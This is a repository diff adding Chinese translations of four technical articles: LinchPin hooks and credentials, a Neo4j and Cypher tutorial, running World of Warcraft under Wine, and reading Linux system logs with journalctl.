hook 描述起来非常简单,但理解它们强大的功能却并不简单。这个特性的存在是为了给用户灵活提供那些 LinchPin 开发者所没有考虑到的功能。举个例子,借助这个概念,可以在运行另一个 hook 之前,以一种简单的方式先去 ping 一组系统。
|
||||
|
||||
更仔细地去研究 _工作空间_ ,你可能会注意到 `hooks` 目录,让我们看一下这个目录的结构:
|
||||
|
||||
```
|
||||
$ tree hooks/
|
||||
hooks/
|
||||
├── ansible
|
||||
│ ├── ping
|
||||
│ │ └── dummy_ping.yaml
|
||||
└── shell
|
||||
└── database
|
||||
├── init_db.sh
|
||||
└── setup_db.sh
|
||||
```
|
||||
|
||||
在任何情况下,hook 都可以用在 `PinFile` 中,展示如下:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
hooks:
|
||||
postup:
|
||||
- name: ping
|
||||
type: ansible
|
||||
actions:
|
||||
- dummy_ping.yaml
|
||||
- name: database
|
||||
type: shell
|
||||
actions:
|
||||
- setup_db.sh
|
||||
- init_db.sh
|
||||
```
|
||||
|
||||
基本概念是有三个 postup 动作要完成。Hook 是从上到下运行的,因此,Ansible `ping` 任务将首先运行,紧接着是两个 shell 任务, `setup_db.sh` 和 `init_db.sh`。假设 hook 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。
|
||||
|
||||
### 认证的驱动程序
|
||||
|
||||
在 LinchPin 的最初设计中,开发者决定在 Ansible playbooks 中管理认证;然而,逐渐有更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。
|
||||
|
||||
#### 配置
|
||||
|
||||
让用户使用驱动程序提供的认证方法去完成这个任务。举个实例,如果对于 OpenStack 调用的拓扑,标准方法是使用一个 yaml 文件,或者类似于 `OS_` 前缀的环境变量。`clouds.yaml` 文件是一个 profile 文件的组成部分,它有一个 `auth` 节:
|
||||
|
||||
```
|
||||
clouds:
|
||||
default:
|
||||
auth:
|
||||
auth_url: http://stack.example.com:5000/v2.0/
|
||||
project_name: factory2
|
||||
username: factory-user
|
||||
password: password-is-not-a-good-password
|
||||
```
|
||||
|
||||
更多详细信息在 [OpenStack documentation][21]。
|
||||
|
||||
这个 `clouds.yaml` 或者任何其它认证文件位于 `default_credentials_path` (比如,`~/.config/linchpin`)中,并在拓扑中引用:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: openstack-test
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: linchpin
|
||||
resource_group_type: openstack
|
||||
resource_definitions:
|
||||
- name: resource
|
||||
type: os_server
|
||||
flavor: m1.small
|
||||
image: rhel-7.2-server-x86_64-released
|
||||
count: 1
|
||||
keypair: test-key
|
||||
networks:
|
||||
- test-net2
|
||||
fip_pool: 10.0.72.0/24
|
||||
credentials:
|
||||
filename: clouds.yaml
|
||||
profile: default
|
||||
```
|
||||
|
||||
`default_credentials_path` 可以通过修改 `linchpin.conf` 改变。
|
||||
|
||||
拓扑在底部包含一个新的 `credentials` 节。使用 `openstack`、`ec2`、和 `gcloud` 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的名为 `clouds.yaml` 的文件,并搜索名为 `default` 的 _配置_。
|
||||
|
||||
假设认证被找到并被加载,配给将正常继续。
|
||||
|
||||
### 简化
|
||||
|
||||
虽然 LinchPin 可以完成复杂的拓扑、库存布局、hooks、和认证管理,但是,终极目标是简化。通过使用一个命令行界面的简化,除了提升已经完成的 1.0 版的开发者体验外,LinchPin 将持续去展示复杂的配置可以很简单地去管理。
|
||||
|
||||
### 社区的成长
|
||||
|
||||
在过去的一年中,LinchPin 社区已经有了 [邮件列表][22] 和一个 IRC 频道(chat.freenode.net 上的 #linchpin),而且我们在 [GitHub][23] 上很努力地管理它。
|
||||
|
||||
在过去的一年里,社区成员已经从 2 位核心开发者增加到大约 10 位贡献者。更多的人持续参与到项目中。如果你对 LinchPin 感兴趣,可以给我们写信、在 GitHub 上提问,加入 IRC,或者给我们发邮件。
|
||||
|
||||
_这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐湖城举行。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
Clint Savage - 工作于 Red Hat 是一位负责原子项目(Project Atomic)的高级软件工程师。他的工作是为 Fedora、CentOS、和 Red Hat Enterprise Linux(RHEL)提供自动原子服务器构建。
|
||||
|
||||
-------------
|
||||
|
||||
via: https://opensource.com/article/17/6/linchpin
|
||||
|
||||
作者:[Clint Savage][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/herlo
|
||||
[1]:https://opensource.com/resources/cloud?src=cloud_resource_menu1
|
||||
[2]:https://opensource.com/resources/what-is-openstack?src=cloud_resource_menu2
|
||||
[3]:https://opensource.com/resources/what-is-kubernetes?src=cloud_resource_menu3
|
||||
[4]:https://opensource.com/16/12/yearbook-why-operating-system-matters?src=cloud_resource_menu4
|
||||
[5]:https://opensource.com/business/16/10/interview-andy-cathrow-anchore?src=cloud_resource_menu5
|
||||
[6]:https://opensource.com/article/17/6/linchpin?rate=yx4feHOc5Kf9gaZe5S4MoVAmf9mgtociUimJKAYgwZs
|
||||
[7]:https://www.openwest.org/custom/description.php?id=166
|
||||
[8]:https://www.openwest.org/
|
||||
[9]:https://opensource.com/user/145261/feed
|
||||
[10]:https://www.flickr.com/photos/internetarchivebookimages/14587478927/in/photolist-oe2Gwy-otuvuy-otus3U-otuuh3-ovwtoH-oe2AXD-otutEw-ovwpd8-oe2Me9-ovf688-oxhaVa-oe2mNh-oe3AN6-ovuyL7-ovf9Kt-oe2m4G-ovwqsH-ovjfJY-ovjfrU-oe2rAU-otuuBw-oe3Dgn-oe2JHY-ovfcrF-oe2Ns1-ovjh2N-oe3AmK-otuwP7-ovwrHt-ovwmpH-ovf892-ovfbsr-ovuAzN-ovf3qp-ovuFcJ-oe2T3U-ovwn8r-oe2L3T-oe3ELr-oe2Dmr-ovuyB9-ovuA9s-otuvPG-oturHA-ovuDAh-ovwkV6-ovf5Yv-ovuCC5-ovfc2x-oxhf1V
|
||||
[11]:http://sexysexypenguins.com/posts/introducing-linch-pin/
|
||||
[12]:http://linch-pin.readthedocs.io/en/develop/
|
||||
[13]:https://opensource.com/resources/cloud
|
||||
[14]:http://click.pocoo.org/
|
||||
[15]:https://opensource.com/resources/python
|
||||
[16]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[17]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[18]:https://github.com/CentOS-PaaS-SIG/linchpin/tree/develop/linchpin/examples/topologies
|
||||
[19]:https://github.com/CentOS-PaaS-SIG/linch-pin/tree/develop/linchpin/provision/roles
|
||||
[20]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[21]:https://docs.openstack.org/developer/python-openstackclient/configuration.html
|
||||
[22]:https://www.redhat.com/mailman/listinfo/linchpin
|
||||
[23]:https://github.com/CentOS-PaaS-SIG/linch-pin/projects/4
|
||||
[24]:https://opensource.com/users/herlo
|
124
published/20170717 Neo4j and graph databases Getting started.md
Normal file
124
published/20170717 Neo4j and graph databases Getting started.md
Normal file
@ -0,0 +1,124 @@
|
||||
Neo4j 和图数据库起步
|
||||
============================================================
|
||||
|
||||
> 在这个三篇文章系列的第二篇中,我们将安装 Neo4j 并通过网页客户端在图中插入和查询数据。
|
||||
|
||||
![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started")
|
||||
|
||||
在本系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页客户端在图中插入并查询数据。
|
||||
|
||||
可通过 [他们的网站][10] 下载社区版的 Neo4j!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。
|
||||
|
||||
我会在 Debian 9 (stretch) 上安装软件。你可在 [这里][11] 查看完整说明。如果你正在使用 Debian 8 (jessie) 或更老的版本,你可以安装当前的版本,但会出现的一点小问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。
|
||||
|
||||
```
|
||||
wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo apt-get install neo4j
|
||||
```
|
||||
|
||||
在我的系统中,出于某些原因,我创建好 `/var/run/neo4j` 之后它就可以很轻松地开始了。Neo4j 给了一个“最大打开文件数”的警告,但因为是测试环境所以我不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 上的连接。如果你的机器是 Debian ,那这很好,但是我的不是。我修改了 `/etc/neo4j/neo4j.conf` ,取消注释了下面这行:
|
||||
|
||||
```
|
||||
dbms.connectors.default_listen_address=0.0.0.0
|
||||
```
|
||||
|
||||
在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码都是 `neo4j`;你需要设置一个新密码,然后会出现初始页面:
|
||||
|
||||
![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J")
|
||||
|
||||
让我们在 Neo4j 上创建[上篇文章][8]中使用过的图。如下图:
|
||||
|
||||
![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node")
|
||||
|
||||
类似 MySQL 和其它的数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。<ruby>节点<rt>node</rt></ruby>需要用圆括号表示,而<ruby>关系 <rt>relationship</rt></ruby> 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。
|
||||
|
||||
首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部区域中,在那里运行查询语句。
|
||||
|
||||
```
|
||||
CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' })
|
||||
```
|
||||
|
||||
注意,在标签前的字符就是变量。这些信息会在出现在各个地方,但我们在这里并不会用到。但你不能不指定相应信息就盲目创建,所以我们使用它们然后就忽略它们。
|
||||
|
||||
在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点:
|
||||
|
||||
```
|
||||
MATCH (n) RETURN n
|
||||
```
|
||||
|
||||
这条语句会返回一个可视化的图。(在应用内,你可以在返回的图中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像:
|
||||
|
||||
|
||||
![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph")
|
||||
|
||||
添加关系需要一点技巧;你需要连接的节点必须是 “<ruby>在限定范围内的<rt>in scope</rt></ruby>”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚:
|
||||
|
||||
```
|
||||
MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b)
|
||||
```
|
||||
|
||||
这条语句会创建一个关系并设置两个属性。重新运行该 `MATCH` 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。
|
||||
|
||||
我们来添加其它的关系。比起使用一系列的 `MATCH` 语句,我会一次性匹配完成,并从中 `CREATE` 创建多个关系。
|
||||
|
||||
```
|
||||
MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e)
|
||||
```
|
||||
|
||||
重新运行该 `MATCH` 语句,你将会看到下面图像:
|
||||
|
||||
|
||||
![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH")
|
||||
|
||||
如果你喜欢,你可以将节点拖拉成像我之前画的图的样子。
|
||||
|
||||
在这个例子中,我们唯一使用的 `MATCH` 就是 `MATCH` 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系:
|
||||
|
||||
```
|
||||
MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c
|
||||
```
|
||||
|
||||
在一个更复杂的图中,你可以做更多的细节查询。(LCTT 译注:此例子为 Neo4j 自带例子的)例如,你有关于电影和人的节点,还有像 `ACTED IN`、`DIRECTED`、`WROTE SCREENPLAY` 等属性的关系,你可以运行下面这个查询:
|
||||
|
||||
```
|
||||
MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title
|
||||
```
|
||||
|
||||
……上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用:
|
||||
|
||||
```
|
||||
MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role
|
||||
```
|
||||
|
||||
还有更多更炫酷的 Cypher 语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。
|
||||
|
||||
在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。
|
||||
|
||||
(图片来源 : opensource.com)
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started
|
||||
|
||||
作者:[Ruth Holloway][a]
|
||||
译者:[happygeorge01](https://github.com/happygeorge01)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/druthb
|
||||
[1]:https://opensource.com/file/363066
|
||||
[2]:https://opensource.com/file/363061
|
||||
[3]:https://opensource.com/file/363071
|
||||
[4]:https://opensource.com/file/363076
|
||||
[5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4
|
||||
[6]:https://opensource.com/users/druthb
|
||||
[7]:https://opensource.com/user/36051/feed
|
||||
[8]:https://linux.cn/article-8728-1.html
|
||||
[9]:https://neo4j.com/
|
||||
[10]:https://neo4j.com/download/community-edition/
|
||||
[11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137
|
||||
[12]:https://neo4j.com/docs/developer-manual/current/cypher/
|
||||
[13]:https://opensource.com/users/druthb
|
||||
[14]:https://opensource.com/users/druthb
|
||||
[15]:https://opensource.com/users/druthb
|
||||
[16]:https://opensource.com/tags/programming
|
@ -1,97 +1,92 @@
|
||||
如何使用 Wine 在 Linux 下玩魔兽世界
|
||||
======
|
||||
|
||||
### 目标
|
||||
**目标:**在 Linux 中运行魔兽世界
|
||||
|
||||
在 Linux 中运行魔兽世界
|
||||
**发行版:**适用于几乎所有的 Linux 发行版。
|
||||
|
||||
### 发行版
|
||||
**要求:**具有 root 权限的 Linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。
|
||||
|
||||
适用于几乎所有的 Linux 发行版。
|
||||
**难度:**简单
|
||||
|
||||
### 要求
|
||||
**约定:**
|
||||
|
||||
具有 root 权限的 linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。
|
||||
|
||||
### 难度
|
||||
|
||||
简单
|
||||
|
||||
### 约定
|
||||
|
||||
* # - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* $ - 使用普通非特权用户执行
|
||||
* `#` - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* `$` - 使用普通非特权用户执行
|
||||
|
||||
### 简介
|
||||
|
||||
魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 这段时间以来暴雪从来没有发不过一个官方的 Linux 客户端。 不过还好,我们有 Wine。
|
||||
魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 一直以来暴雪从未发布过官方的 Linux 客户端。 不过还好,我们有 Wine。
|
||||
|
||||
### 安装 Wine
|
||||
|
||||
你可以试着用一下普通的 Wine,但它在游戏性能方面改进不大。 Wine Staging 以及带 Gallium Nine 补丁的 Wine 几乎在各方面都要更好一点。 如果你使用了闭源的驱动程序, 那么 Wine Staging 是最好的选择。 若使用了 Mesa 驱动程序, 则还需要打上 Gallium Nine 补丁。
|
||||
|
||||
根据你使用的发行版,参考 [Wine install guide][6] 来安装。
|
||||
根据你使用的发行版,参考 [Wine 安装指南][6] 来安装。
|
||||
|
||||
### Winecfg
|
||||
|
||||
打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 "Staging" 标签页。 这里根据你用的是 staging 版本的 Wine 还是 打了 Gallium 补丁的 Wine 来进行选择。
|
||||
打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 “Staging” 标签页。 这里根据你用的是 staging 版本的 Wine 还是打了 Gallium 补丁的 Wine 来进行选择。
|
||||
|
||||
![Winecfg Staging Settings][1]
|
||||
|
||||
不管是哪个版本的 Wine,都需要启用 VAAPI 以及 EAX。 至于是否隐藏 Wine 的版本则由你自己决定。
|
||||
|
||||
如果你用的是 Staging 补丁,则启用 CSMT。 如果你用的是 Gallium Nine,则启用 Gallium Nine。 但是你不能两个同时启用。
|
||||
|
||||
### Winetricks
|
||||
|
||||
下一步轮到 Winetricks 了。如果你对它不熟,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章[Winetricks guide][7]:
|
||||
下一步轮到 Winetricks 了。如果你对它不了解,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章 [Winetricks 指南][7]:
|
||||
|
||||
![Winetricks Corefonts Installed][2]
|
||||
要让 WoW 以及战网启动程序(Battle.net launcher)工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望在战网启动程序中现实所有互联网上的数据的话,就还需要安装 DLL 部分中的 `ie8`。
|
||||
|
||||
要让 WoW 以及<ruby>战网启动程序<rt>Battle.net launcher</rt></ruby>工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望来自互联网上的所有数据都显示在战网启动程序中的话,就还需要安装 DLL 部分中的 ie8。
|
||||
|
||||
### Battle.net
|
||||
|
||||
现在你配置好了 Wine 了,可以安装 Battle.net 应用了。 Battle.net 应用用来安装和升级 WoW 以及其他暴雪游戏。 它经常在升级后会出现问题。 因此若它突然出现问题,请查看 [WineHQ 页面][8]。
|
||||
|
||||
毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用
|
||||
毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用。
|
||||
|
||||
下载完毕后,使用 Wine 打开 `.exe` 文件, 然后按照安装指引一步步走下去,就跟在 Windows 上一样。
|
||||
|
||||
![Battle.net Launcher With WoW Installed][3]
|
||||
应用安装完成后,登陆/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。
|
||||
|
||||
应用安装完成后,登录/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。
|
||||
|
||||
### 运行游戏
|
||||
|
||||
![WoW Advanced Settings][4]
|
||||
在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登陆界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的“Advanced”标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。
|
||||
|
||||
在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登录界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的 “Advanced” 标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。
|
||||
|
||||
现在游戏应该可以玩了。请注意,游戏的性能严重依赖于你的硬件水平。 WoW 是一个很消耗 CPU 的游戏, 而 Wine 更加加剧了 CPU 的负担。 如果你的 CPU 不够强劲, 你的体验会很差。 不过 WoW 支持低特效,因此你可以调低画质让游戏更流畅。
|
||||
|
||||
#### 性能调优
|
||||
|
||||
![WoW Graphics Settings][5]
|
||||
|
||||
很难说什么样的设置最适合你。WoW 在基本设置中有一个很简单的滑动比例条。 它的配置应该要比在 Windows 上低几个等级,毕竟这里的性能不像 Windows 上那么好。
|
||||
|
||||
先调低最可能的罪魁祸首。像抗锯齿和粒子就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。
|
||||
先调低最可能的罪魁祸首。像<ruby>抗锯齿<rt>anti-aliasing</rt></ruby>和<ruby>粒子<rt>particles</rt></ruby>就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。
|
||||
|
||||
WoW 对 raid 以及 battleground 有专门的配置项。raid 以及 battleground 实例中的内容需要更精细的画面。 有时间 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。
|
||||
WoW 对 “Raid and Battleground” 有专门的配置项。这可以为 “Raid and Battleground” 实例中的内容创建更精细的画面。 有时候 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。
|
||||
|
||||
实验然后看看哪些配置最适合你的系统。这完全取决于你的硬件和你的系统配置。
|
||||
|
||||
### 最后结语
|
||||
|
||||
从未发不过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。。
|
||||
虽然从未发布过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。
|
||||
|
||||
虽然有这个说法,但后续的更新和补丁还是会影响到这个古老的游戏, 所以请随时做好出问题的准备。 不管怎样, 就算出问题了,也总是早已有了解决方案, 你只需要找到它而已。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine
|
||||
|
||||
作者:[Nick Congleton][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,59 @@
|
||||
用系统日志了解你的 Linux 系统
|
||||
============
|
||||
|
||||
本文摘自为 Linux 小白(或者非资深桌面用户)传授技巧的系列文章。该系列文章旨在为 LinuxMagazine 发布的第 30 期特别版 “[Linux 入门][2]” (基于 [openSUSE Leap][3] )提供补充说明。
|
||||
|
||||
本文作者是 Romeo S.,她是一名基于 PDX 的企业 Linux 专家,专注于为创新企业提供富有伸缩性的解决方案。
|
||||
|
||||
Linux 系统日志非常重要。后台运行的程序(通常被称为守护进程或者服务进程)处理了你 Linux 系统中的大部分任务。当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为它们做过什么的“历史”信息。这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接。所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg)
|
||||
|
||||
*Photo by Markus Spiske on Unsplash*
|
||||
|
||||
在你的 Linux 计算机上有很多不同的日志。历史上,它们一般以纯文本的格式存储到 `/var/log` 目录中。现在依然有很多日志这样做,你可以很方便的使用 `less` 来查看它们。
|
||||
|
||||
在新装的 openSUSE Leap 42.3 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储。 `systemd`这套系统负责启动守护进程,并在系统启动时让计算机做好被使用的准备。由 `systemd` 记录的日志以二进制格式存储,这使得它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看。好在这个工具已经预安装在你的系统上了:它的名字叫 `journalctl`,而且默认情况下,它会将每个守护进程的所有日志都记录到一个地方。
|
||||
|
||||
只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了。它会用 `less` 分页器显示各种日志。为了让你有个直观的感受, 下面是 `journalctl` 中摘录的一条日志记录:
|
||||
|
||||
```
|
||||
Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM.
|
||||
```
|
||||
|
||||
这条独立的日志记录依次包含了记录的日期和时间、计算机名、记录日志的进程名、记录日志的进程 PID,以及日志内容本身。
|
||||
|
||||
若系统中某个程序运行出问题了,则可以查看日志文件并搜索(使用 `/` 加上要搜索的关键字)程序名称。有可能导致该程序出问题的错误会记录到系统日志中。 有时,错误信息会足够详细到让你能够修复该问题。其他时候,你需要在 Web 上搜索解决方案。 Google 就很适合来搜索奇怪的 Linux 问题。不过搜索时请注意你只输入了日志的实际内容,行首的那些信息(日期、主机名、进程 ID) 对搜索来说是无意义的,会干扰搜索结果。
|
||||
|
||||
解决方法一般在搜索结果的前几个链接中就会有了。当然,你不能只是无脑地运行从互联网上找到的那些命令:请一定先搞清楚你要做的事情是什么,它的效果会是什么。话虽如此,搜索系统日志中的特定条目要比用通用关键字直接描述该故障有用得多。因为程序出错有很多原因,而且同样的故障表现也可能是由多种问题引发的。
|
||||
|
||||
比如,系统无法发声的原因有很多,可能是播放器没有插好,也可能是声音系统出故障了,还可能是缺少合适的驱动程序。如果你只是泛泛的描述故障表现,你会找到很多无关的解决方法,而你也会浪费大量的时间。而专门搜索日志文件中的实际内容,你也许会查询出其它人也有相同日志内容的结果。
|
||||
|
||||
你可以对比一下图 1 和图 2。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png)
|
||||
|
||||
图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果。这种搜索通常没什么用。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png)
|
||||
|
||||
图 2 搜索特定的日志行会显示出精确的,有用的结果。这种搜索通常很有用。
|
||||
|
||||
也有一些系统不用 `journalctl` 来记录日志。在桌面系统中最常见的这类日志包括用于记录 openSUSE 包管理器的行为的 `/var/log/zypper.log`; 记录系统启动时消息的 `/var/log/boot.log` ,开机时这类消息往往滚动的特别快,根本看不过来;`/var/log/ntp` 用来记录 Network Time Protocol (NTP)守护进程同步时间时发生的错误。 另一个存放硬件故障信息的地方是 “Kernel Ring Buffer”(内核环状缓冲区),你可以输入 `dmesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看)。“Kernel Ring Buffer” 存储在内存中,因此会在重启电脑后丢失。不过它包含了 Linux 内核中的重要事件,比如新增了硬件、加载了模块,以及奇怪的网络错误。
|
||||
|
||||
希望你已经准备好深入了解你的 Linux 系统了! 祝你玩的开心!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/
|
||||
|
||||
作者:[chabowski]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[1]:https://www.suse.com/communities/blog/author/chabowski/
|
||||
[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux
|
||||
[3]:https://en.opensuse.org/Portal:42.3
|
||||
[4]:http://www.linux-magazine.com/
|
59
